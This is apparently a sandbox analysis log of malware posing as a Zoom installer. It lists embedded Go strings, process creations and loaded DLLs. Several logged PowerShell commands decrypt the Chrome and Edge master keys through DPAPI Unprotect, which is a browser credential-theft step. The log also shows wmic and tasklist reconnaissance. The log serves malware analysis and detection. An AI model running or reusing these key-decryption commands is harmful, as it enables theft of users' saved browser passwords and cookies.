    Source: ZoomInstaller.exeString found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
    Source: ZoomInstaller.exeString found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
    Source: ZoomInstaller.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
    Source: ZoomInstaller.exeString found in binary or memory: -stopTimer
    Source: ZoomInstaller.exeString found in binary or memory: -addr
    Source: ZoomInstaller.exeString found in binary or memory: -stop
    Source: ZoomInstaller.exeString found in binary or memory: -start
    Source: ZoomInstaller.exeString found in binary or memory: ,-stop
    Source: ZoomInstaller.exeString found in binary or memory: -addrs
    Source: ZoomInstaller.exeString found in binary or memory: /0-addrs
    Source: ZoomInstaller.exeString found in binary or memory: 70-addrs
    Source: unknownProcess created: C:\Users\user\Desktop\ZoomInstaller.exe "C:\Users\user\Desktop\ZoomInstaller.exe"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get captionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get CaptionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get VersionJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
